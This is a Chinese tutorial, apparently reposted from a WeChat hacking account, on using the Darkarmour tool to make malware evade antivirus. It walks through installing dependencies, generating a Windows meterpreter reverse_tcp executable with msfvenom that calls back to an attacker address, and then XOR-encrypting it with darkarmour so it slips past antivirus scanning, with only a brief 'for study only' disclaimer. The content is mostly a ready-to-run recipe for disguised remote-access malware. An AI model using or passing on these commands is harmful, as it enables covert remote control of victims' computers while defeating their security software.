darkarmour是一款基于Python的免杀工具。通过对shell加密,并在内存执行从而逃逸杀毒。通过本文一起来学习吧!
注意:本文仅供学习和研究,坚决反对一切危害网络安全的行为,造成法律后果自行负责。
安装依赖环境
在使用过程中可能遇到的唯一问题是二进制依赖项。所需的二进制文件是:i686-w64-mingw32-g++,i686-w64-mingw32-gcc和upx,我们可以通过apt命令进行安装。
sudo apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode
下载项目
wget https://github.com/bats3c/darkarmour/archive/refs/heads/master.zip
unzip master.zip
cd darkarmour-master
运行
python darkarmour.py
使用
我们首先先生成一个msf的shell。命令如下
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.123.74 LPORT=5555 -f exe -o kali.exe
然后执行命令
python3 darkarmour.py -f kali.exe -e xor -j -k snaker -l 10 -o kali2.exe
生成完后后效果
免杀测试
注意,以下结果可能随着病毒库的更新,在后面肯定会报毒的。只不过是时间的问题罢了。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):利用Darkarmour实现免杀
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/151902.html
